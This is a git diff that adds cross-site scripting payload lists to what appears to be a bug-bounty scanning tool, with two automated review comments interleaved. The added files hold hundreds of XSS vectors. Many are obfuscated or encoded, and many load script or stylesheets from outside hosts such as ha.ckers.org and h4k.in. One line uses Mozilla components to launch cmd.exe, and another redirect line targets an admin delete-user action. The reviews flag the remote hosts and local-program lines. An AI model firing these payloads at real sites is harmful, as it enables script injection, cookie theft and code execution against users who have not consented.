'' 
SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT> +eval(name) +<A HREF="http://www.google.com./">XSS</A> +<<SCRIPT>alert("XSS");//<</SCRIPT> +<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<A HREF="//google">XSS</A> +<A HREF="http://ha.ckers.org@google">XSS</A> +<A HREF="http://google:ha.ckers.org">XSS</A> +firefoxurl:test|"%20-new-window%20javascript:alert(\'Cross%2520Browser%2520Scripting!\');" +<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET> +<IMG SRC=`javascript:alert("RSnake says### 'XSS'")`> +<IMG SRC="javascript:alert('XSS')" +<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A> +<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29> +<IMG SRC=javascript:alert(&quot;XSS&quot;)> +'';!--"<script>alert(0);</script>=&{(alert(1))} +<?xml version="1.0"?><html:html xmlns:html='http://www.w3.org/1999/xhtml'><html:script>alert(document.cookie);</html:script></html:html> +<img src=`x` onrerror= ` ;; alert(1) ` /> +</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> + style=color: expression(alert(0));" a=" +vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83)))< +<IFRAME SRC="javascript:alert('XSS');"></IFRAME> +a=<a><b>%3c%69%6d%67%2f%73%72%63%3d%31%20%6f%6e%65%72%72%6f%72%3d%61%6c%65%72%74%28%31%29%3e</b></a>document.write(unescape(a..b)) +<IMG SRC="jav&#x09;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0A;ascript:alert(<WBR>'XSS');"> +<IMG SRC="jav&#x0D;ascript:alert(<WBR>'XSS');"> +<IMG SRC=javascript:alert(String.fromCharCode(88###83###83))> +<IMG DYNSRC="javascript:alert('XSS');"> +<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode"> +Redirect 302 /a.jpg 
http://victimsite.com/admin.asp&deleteuser +<IMG LOWSRC="javascript:alert('XSS');"> +<IMG SRC=javascript:alert('XSS')> +exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'> +<IMG SRC="javascript:alert('XSS');"> +<IMG SRC='vbscript:msgbox("XSS")'> +<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');"> +<A HREF="http://66.102.7.147/">XSS</A> +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+''; u1=s1+s2+s3;URL=u1 +s1=0?'1':'i'; s2=0?'1':'fr'; s3=0?'1':'ame'; i1=s1+s2+s3; s1=0?'1':'jav'; s2=0?'1':'ascr'; s3=0?'1':'ipt'; s4=0?'1':':'; s5=0?'1':'ale'; s6=0?'1':'rt'; s7=0?'1':'(1)'; i2=s1+s2+s3+s4+s5+s6+s7; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +s1=['java'+''+''+'scr'+'ipt'+':'+'aler'+'t'+'(1)']; +s1=['java'||''+'']; s2=['scri'||''+'']; s3=['pt'||''+'']; +s1=!''&&'jav';s2=!''&&'ascript';s3=!''&&':';s4=!''&&'aler';s5=!''&&'t';s6=!''&&'(1)';s7=s1+s2+s3+s4+s5+s6;URL=s7; +s1='java'||''+'';s2='scri'||''+'';s3='pt'||''+''; +<BR SIZE="&{alert('XSS')}"> +<A HREF="javascript:document.location='http://www.google.com/'">XSS</A> +%0da=eval;b=alert;a(b(/d/.source)); +<a href = "javas cript :ale rt(1)">test ++alert(0)+ +<body onload=;a2={y:eval};a1={x:a2.y('al'+'ert')};;;;;;;;;_=a1.x;_(1);;;; +<body onload=a1={x:this.parent.document};a1.x.writeln(1);> +<body onload=;a1={x:document};;;;;;;;;_=a1.x;_.write(1);;;; +<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER> +<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS +<IMG SRC="livescript:[code]"> +<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);"> +<IMG 
SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041> +<IMG """><SCRIPT>alert("XSS")</SCRIPT>"> +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');"> +<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64###PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K"> +<A HREF="http://6&#09;6.000146.0x7.147/">XSS</A> +<IMG SRC="mocha:[code]"> + style=-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" + sstyle=foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +<IMGSRC="javascript:alert('XSS')"> +b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name +a=/ev/// .source a+=/al/// .source a[a] (name) +a=/ev/ .source a+=/al/ .source,a = a[a] a(name) +setTimeout// +(name// ,0) +navigatorurl:test" -chrome "javascript:C=Components.classes;I=Components.interfaces;file=C[\'@mozilla.org/file/local;1\'].createInstance(I.nsILocalFile);file.initWithPath(\'C:\'+String.fromCharCode(92)+String.fromCharCode(92)+\'Windows\'+String.fromCharCode(92)+String.fromCharCode(92)+\'System32\'+String.fromCharCode(92)+String.fromCharCode(92)+\'cmd.exe\');process=C[\'@mozilla.org/process/util;1\'].createInstance(I.nsIProcess);process.init(file);process.run(true%252c{}%252c0);alert(process) +<SCRIPT SRC=http://ha.ckers.org/xss.js +<SCRIPT>a=/XSS/alert(a.source)</SCRIPT> +<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT> +<BODY onload!#$%&()*~+-_.###:;?@[/|\]^`=alert("XSS")> +</noscript><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out +perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out 
+<body onload=;;;;;;;;;;;_=alert;_(1);;;; +s1=0?'':'i';s2=0?'':'fr';s3=0?'':'ame';i1=s1+s2+s3;s1=0?'':'jav';s2=0?'':'ascr';s3=0?'':'ipt';s4=0?'':':';s5=0?'':'ale';s6=0?'':'rt';s7=0?'':'(1)';i2=s1+s2+s3+s4+s5+s6+s7;i=createElement(i1);i.src=i2;x=parentNode;x.appendChild(i); +<body <body onload=;;;;;al:eval('al'+'ert(1)');;> +<IMGSRC=&#106;&#97;&#118;&#97;&<WBR>#115;&#99;&#114;&#105;&#112;&<WBR>#116;&#58;&#97;&#108;&#101;&<WBR>#114;&#116;&#40;&#39;&#88;&#83<WBR>;&#83;&#39;&#41> +<IMGSRC=&#x6A&#x61&#x76&#x61&#x73&<WBR>#x63&#x72&#x69&#x70&#x74&#x3A&<WBR>#x61&#x6C&#x65&#x72&#x74&#x28&<WBR>#x27&#x58&#x53&#x53&#x27&#x29> +<IMGSRC=&#0000106&#0000097&<WBR>#0000118&#0000097&#0000115&<WBR>#0000099&#0000114&#0000105&<WBR>#0000112&#0000116&#0000058&<WBR>#0000097&#0000108&#0000101&<WBR>#0000114&#0000116&#0000040&<WBR>#0000039&#0000088&#0000083&<WBR>#0000083&#0000039&#0000041> +>"'><img%20src%3D%26%23x6a;%26%23x61;%26%23x76;%26%23x61;%26%23x73;%26%23x63;%26%23x72;%26%23x69;%26%23x70;%26%23x74;%26%23x3a; + alert(%26quot;%26%23x20;XSS%26%23x20;Test%26%23x20;Successful%26quot;)> +(1?(1?{a:1?""[1?"ev\a\l":0](1?"\a\lert":0):0}:0).a:0)[1?"\c\a\l\l":0](content,1?"x\s\s":0) +<body/s/onload=x={doc:parent.document};x.doc.writeln(1) +<body/””$/onload=x={doc:parent['document']};x.doc.writeln(1) +<body/""$/onload=x={doc:parent['document']};x.doc.writeln(1) +123[''+<_>ev</_>+<_>al</_>](''+<_>aler</_>+<_>t</_>+<_>(1)</_>); +s1=<s>evalalerta(1)a</s>,s2=<s></s>+'',s3=s1+s2,e1=/s/!=/s/?s3[0]:0,e2=/s/!=/s/?s3[1]:0,e3=/s/!=/s/?s3[2]:0,e4=/s/!=/s/?s3[3]:0,e=/s/!=/s/?0[e1+e2+e3+e4]:0,a1=/s/!=/s/?s3[4]:0,a2=/s/!=/s/?s3[5]:0,a3=/s/!=/s/?s3[6]:0,a4=/s/!=/s/?s3[7]:0,a5=/s/!=/s/?s3[8]:0,a6=/s/!=/s/?s3[10]:0,a7=/s/!=/s/?s3[11]:0,a8=/s/!=/s/?s3[12]:0,a=a1+a2+a3+a4+a5+a6+a7+a8,1,e(a) +o={x:''+<s>eva</s>+<s>l</s>,y:''+<s>aler</s>+<s>t</s>+<s>(1)</s>};function f() { 0[this.x](this.y) }f.call(o); +___=1?'ert(123)':0,_=1?'al':0,__=1?'ev':0,1[__+_](_+___) +<OBJECT TYPE="text/x-scriptlet" 
DATA="http://ha.ckers.org/scriptlet.html"></OBJECT> +<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT> +a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d); +<A HREF="http://0102.0146.0007.00000223/">XSS</A> +open(name) +<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?> +alert(1) +<A HREF="//www.google.com/">XSS</A> +<SCRIPT SRC=//ha.ckers.org/.j> +0%0d%0a%00<script src=//h4k.in> +s1=''+'java'+''+'scr'+'';s2=''+'ipt'+':'+'ale'+'';s3=''+'rt'+''+'(1)'+'';u1=s1+s2+s3;URL=u1 +<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css"> +<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE> +<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet"> +<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE> +<A HREF="http://google.com/">XSS</A> +<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT> +res://c:\\program%20files\\adobe\\acrobat%207.0\\acrobat\\acrobat.dll/#2/#210 +<SCRIPT>alert('XSS')</SCRIPT> +<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> +<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> +a=0||'ev'+'al',b=0||location.hash,c=0||'sub'+'str',1[a](b[c](1)) +a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n.h'+'ash.sub'||0;b+=0||'str(1)';c=b[a];c(c(b)) +eval.call(this,unescape.call(this,location)) +d=0||'une'+'scape'||0;a=0||'ev'+'al'||0;b=0||'locatio';b+=0||'n'||0;c=b[a];d=c(d);c(d(c(b))) +l= 0 || 'str',m= 0 || 'sub',x= 0 || 'al',y= 0 || 'ev',g= 0 || 'tion.h',f= 0 || 'ash',k= 0 || 'loca',d= (k) + (g) + (f),a +_=eval,__=unescape,___=document.URL,_(__(___)) +$_=document,$__=$_.URL,$___=unescape,$_=$_.body,$_.innerHTML = $___(http=$__) +$=document,$=$.URL,$$=unescape,$$$=eval,$$$($$($)) 
+evil=/ev/.source+/al/.source,changeProto=/Strin/.source+/g.prototyp/.source+/e.ss=/.source+/Strin/.source+/g.prototyp/.source+/e.substrin/.source+/g/.source,hshCod=/documen/.source+/t.locatio/.source+/n.has/.source+/h/.source;7[evil](changeProto);hsh=7[evil](hshCod),cod=hsh.ss(1);7[evil](cod) +with(location)with(hash)eval(substring(1)) +<IMG SRC=" &#14; javascript:alert('XSS');"> +<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"--> +<STYLE TYPE="text/javascript">alert('XSS');</STYLE> +<style>body:after{content: “\61\6c\65\72\74\28\31\29″}</style><script> +eval(eval(document.styleSheets[0].cssRules[0].style.content)) +</script> +<XSS STYLE="xss:expression(alert('XSS'))"> +<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE> +<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A> +<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE> +<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))"> +<LINK REL="stylesheet" HREF="javascript:alert('XSS');"> +}</style><script>a=eval;b=alert;a(b(/i/.source));</script> +>"' +a=alert;a(0) +A=alert;A(1) +<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE> +<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE> +</textarea><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +'%uff1cscript%uff1ealert('XSS')%uff1c/script%uff1e' +http://aa"><script>alert(123)</script> +http://aa'><script>alert(123)</script> +>%22%27><img%20src%3d%22javascript:alert(%27%20XSS%27)%22> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt new file mode 100644 index 0000000..2f2c2e6 --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-mario.txt 
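Review bot: Many entries in this file pull script, CSS or XBL from hosts the project does not control (`ha.ckers.org`, `h4k.in`), so on a page that really is vulnerable the browser loads whatever those domains serve today, which is outside both the tester's and the programme's control. The same hosts appear in XSS-EnDe-mario.txt and XSS-EnDe-xssAttacks.txt in this commit. I would replace the host with a placeholder such as `{{CALLBACK_HOST}}` (constructed name) that is filled from the operator's own configuration, or keep only the self-contained `alert()` variants. The `aim:` and `navigatorurl:` lines reference local programs (`calc.exe`, `cmd.exe`, a Startup `.bat`) rather than a harmless dialog and look out of scope for a bounty scan, so I would drop them.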
@@ -0,0 +1,52 @@ +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'><SCRIPT>alert(4)</SCRIPT>=&{}");}alert(6);function xss(){// +';alert(0)//\';alert(1)//";alert(2)//\";alert(3)//--></SCRIPT>">'></title><SCRIPT>alert(4)</SCRIPT>=&{</title><script>alert(5)</script>}");} +'';!--"<script>alert(0);</script>=&{(alert(1))} +"><script>alert(0);</script> +'><script>alert(0);</script> +'<script>alert(0);</script> +<img src=x onerror=;;alert(1) /> +</title><script>alert(1)</script> +`> <script>alert(5)</script> +</textarea><br><code onmouseover=a=eval;b=alert;a(b(/g/.source));>MOVE MOUSE OVER THIS AREA</code> +</noscript><br><code onmouseover=a=eval;b=alert;a(b(/h/.source));>MOVE MOUSE OVER THIS AREA</code> +}</style><script>a=eval;b=alert;a(b(/i/.source));</script> +;}alert(0);{ +"+alert(0)+" +xyz onerror=alert(6); +onclick=eval/**/(/ale/.source%2b/rt/.source%2b/(7)/.source); +a=eval;b=alert;a(b(8)); +a=1;a=eval;b=alert;a(b(11));// +';//%0da=eval;b=alert;a(b(9));// +";//%0da=eval;b=alert;a(b(10));// +'};a=eval;b=alert;a(b(13));// +"};a=eval;b=alert;a(b(12));// +1};a=eval;b=alert;a(b(14));// +'];a=eval;b=alert;a(b(15));// +"];a=eval;b=alert;a(b(16));// +1];a=eval;b=alert;a(b(17));// +1;a=eval;b=alert;a(b(/c/.source)); +%0da=eval;b=alert;a(b(/d/.source)); +*/a=eval;b=alert;a(b(/e/.source));/* +<script src=//h4k.in +<script src=http://h4k.in/> +<script src=//h4k.in></script> +"><script src=//h4k.in></script>< +<scri +pt src=//h4k.in>< +></script> +<s>000<s>%3cs%3e111%3c/s%3e%3c%73%3e%32%32%32%3c%2f%73%3e&#60&#115&#62&#51&#51&#51&#60&#47&#115&#62&#x3c&#x73&#x3e&#x34&#x34&#x34&#x3c&#x2f&#x73&#x3e +"><script src=http://h4k.in/i.js></script> +"><script>a=document.createElement('script');a.src='http://h4k.in/i.js';document.body.appendChild(a);</script> 
+"><script>eval(String.fromCharCode(97,61,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,97,46,115,114,99,61,39,104,116,116,112,58,47,47,104,52,107,46,105,110,47,105,46,106,115,39,59,100,111,99,117,109,101,110,116,46,98,111,100,121,46,97,112,112,101,110,100,67,104,105,108,100,40,97,41,59))</script> +vbscript:Execute(MsgBox(chr(88)&chr(83)&chr(83))) +" style="color: expression(alert(0));" a=" +</a style=""xx:expr/**/ession(document.appendChild(document.createElement('script')).src='http://h4k.in/i.js')"> +<img src=`x` onrerror= ` ;; alert(1) ` /> +" style="-moz-binding:url(http://h4k.in/mozxss.xml#xss);" a=" +" sstyle="foobar"tstyle="foobar"ystyle="foobar"lstyle="foobar"estyle="foobar"=-moz-binding:url(http://h4k.in/mozxss.xml#xss)>foobar</b>#xss)" a=" +%0aContent-Type:text/html%0a%0a%3cscript%3ealert(0)%3c/script%3ehttp://www.google.de/ +c%00""<script>alert(0);</script> +BODY{-moz-binding:url("http://h4k.in/mozxss.xml%23xss")} +x=alert;x(%26%2340 /finally through!/.source %26%2341); +%26%2339);x=alert;x(%26%2340 /finally through!/.source %26%2341);// +http://aa<script>alert(123)</script> \ No newline at end of file diff --git a/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt b/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt new file mode 100644 index 0000000..9999feb --- /dev/null +++ b/bounty_drive/attacks/xss/payloads/XSS-EnDe-xssAttacks.txt 
@@ -0,0 +1,109 @@
+';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
+'';!--"<XSS>=&{()}
+<SCRIPT>alert('XSS')</SCRIPT>
+<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
+<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
+<BASE HREF="javascript:alert('XSS');//">
+<BGSOUND SRC="javascript:alert('XSS');">
+<BODY BACKGROUND="javascript:alert('XSS');">
+<BODY ONLOAD=alert('XSS')>
+<DIV STYLE="background-image: url(javascript:alert('XSS'))">
+<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
+<DIV STYLE="width: expression(alert('XSS'));">
+<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
+<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
+<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
+<IMG SRC="javascript:alert('XSS');">
+<IMG SRC=javascript:alert('XSS')>
+<IMG DYNSRC="javascript:alert('XSS');">
+<IMG LOWSRC="javascript:alert('XSS');">
+<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
+Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser
+exp/*<XSS STYLE='no\xss:noxss("*//*");xss:&#101;x&#x2F;*XSS*//*/*/pression(alert("XSS"))'>
+<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS
+<IMG SRC='vbscript:msgbox("XSS")'>
+<LAYER SRC="http://ha.ckers.org/scriptlet.html"></LAYER>
+<IMG SRC="livescript:[code]">
+%BCscript%BEalert(%A2XSS%A2)%BC/script%BE
+<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
+<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
+<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
+<IMG SRC="mocha:[code]">
+<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
+<OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389><param name=url value=javascript:alert('XSS')></OBJECT>
+<EMBED SRC="http://ha.ckers.org/xss.swf" AllowScriptAccess="always"></EMBED>
+a="get";&#10;b="URL("";&#10;c="javascript:";&#10;d="alert('XSS');")";eval(a+b+c+d);
+<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
+<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
+<XSS STYLE="xss:expression(alert('XSS'))">
+<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
+<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
+<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
+<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
+<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
+<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
+<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
+<TABLE BACKGROUND="javascript:alert('XSS')"></TABLE>
+<TABLE><TD BACKGROUND="javascript:alert('XSS')"></TD></TABLE>
+<HTML xmlns:xss><?import namespace="xss" implementation="http://ha.ckers.org/xss.htc"><xss:xss>XSS</xss:xss></HTML>
+<XML ID=I><X><C><![CDATA[<IMG SRC="javas]]><![CDATA[cript:alert('XSS');">]]></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML>
+<XML ID="xss"><I><B><IMG SRC="javas<!-- -->cript:alert('XSS')"></B></I></XML><SPAN DATASRC="#xss" DATAFLD="B" DATAFORMATAS="HTML"></SPAN>
+<XML SRC="http://ha.ckers.org/xsstest.xml" ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
+<HTML><BODY><?xml:namespace prefix="t" ns="urn:schemas-microsoft-com:time"><?import namespace="t" implementation="#default#time2"><t:set attributeName="innerHTML" to="XSS<SCRIPT DEFER>alert('XSS')</SCRIPT>"> </BODY></HTML>
+<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
+<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
+<XSS STYLE="behavior: url(http://ha.ckers.org/xss.htc);">
+<SCRIPT SRC="http://ha.ckers.org/xss.jpg"></SCRIPT>
+<!--#exec cmd="/bin/echo '<SCRIPT SRC'"--><!--#exec cmd="/bin/echo '=http://ha.ckers.org/xss.js></SCRIPT>'"-->
+<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
+<BR SIZE="&{alert('XSS')}">
+<%3C&lt&lt;&LT&LT;&#60&#060&#0060&#00060&#000060&#0000060&#60;&#060;&#0060;&#00060;&#000060;&#0000060;&#x3c&#x03c&#x003c&#x0003c&#x00003c&#x000003c&#x3c;&#x03c;&#x003c;&#x0003c;&#x00003c;&#x000003c;&#X3c&#X03c&#X003c&#X0003c&#X00003c&#X000003c&#X3c;&#X03c;&#X003c;&#X0003c;&#X00003c;&#X000003c;&#x3C&#x03C&#x003C&#x0003C&#x00003C&#x000003C&#x3C;&#x03C;&#x003C;&#x0003C;&#x00003C;&#x000003C;&#X3C&#X03C&#X003C&#X0003C&#X00003C&#X000003C&#X3C;&#X03C;&#X003C;&#X0003C;&#X00003C;&#X000003C;\x3c\x3C\u003c\u003C
+<IMG SRC=JaVaScRiPt:alert('XSS')>
+<IMG SRC=javascript:alert(&quot;XSS&quot;)>
+<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
+<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
+<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#39;&#88;&#83;&#83;&#39;&#41;>
+<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
+<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
+<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
+<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
+\";alert('XSS');//
+</TITLE><SCRIPT>alert("XSS");</SCRIPT>
+<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
+<IMG SRC="jav ascript:alert('XSS');">
+<IMG SRC="jav&#x09;ascript:alert('XSS');">
+<IMG SRC="jav&#x0A;ascript:alert('XSS');">
+<IMG SRC="jav&#x0D;ascript:alert('XSS');">
+perl -e 'print "<IMG SRC=java\0script:alert("XSS")>";'> out
+perl -e 'print "&<SCR\0IPT>alert("XSS")</SCR\0IPT>";' > out
+<IMG SRC=" &#14; javascript:alert('XSS');">
+<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
+<SCRIPT SRC=http://ha.ckers.org/xss.js
+<SCRIPT SRC=//ha.ckers.org/.j>
+<IMG SRC="javascript:alert('XSS')"
+<IFRAME SRC=http://ha.ckers.org/scriptlet.html <
+<<SCRIPT>alert("XSS");//<</SCRIPT>
+<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
+<SCRIPT>a=/XSS/alert(a.source)</SCRIPT>
+<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT ="blah" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a="blah" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
+<A HREF="http://66.102.7.147/">XSS</A>
+<A HREF="http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D">XSS</A>
+<A HREF="http://1113982867/">XSS</A>
+<A HREF="http://0x42.0x0000066.0x7.0x93/">XSS</A>
+<A HREF="http://0102.0146.0007.00000223/">XSS</A>
+<A HREF="htt p://6&#09;6.000146.0x7.147/">XSS</A>
+<A HREF="//www.google.com/">XSS</A>
+<A HREF="//google">XSS</A>
+<A HREF="http://ha.ckers.org@google">XSS</A>
+<A HREF="http://google:ha.ckers.org">XSS</A>
+<A HREF="http://google.com/">XSS</A>
+<A HREF="http://www.google.com./">XSS</A>
+<A HREF="javascript:document.location='http://www.google.com/'">XSS</A>
+<A HREF="http://www.gohttp://www.google.com/ogle.com/">XSS</A>
\ No newline at end of file
diff --git a/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt b/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt
new file mode 100644
index 0000000..c3cb825
--- /dev/null
+++ b/bounty_drive/attacks/xss/payloads/XSS-Fuzzing.txt
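Review bot: Three lines in this list are not payloads: `Redirect 302 /a.jpg http://victimsite.com/admin.asp&deleteuser` is a server redirect directive and the two `perl -e 'print ...' > out` lines are shell commands for producing a file, while `<IMG SRC="livescript:[code]">` and `<IMG SRC="mocha:[code]">` still carry an unfilled `[code]` placeholder. Sent verbatim as parameter values they only add requests and noise to the scan results. I would remove them here and in XSS-EnDe-h4k.txt, which contains the same lines. Many of the remaining entries also repeat ones already present in XSS-EnDe-h4k.txt, so de-duplicating the combined lists at load time would cut the request count against the target.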
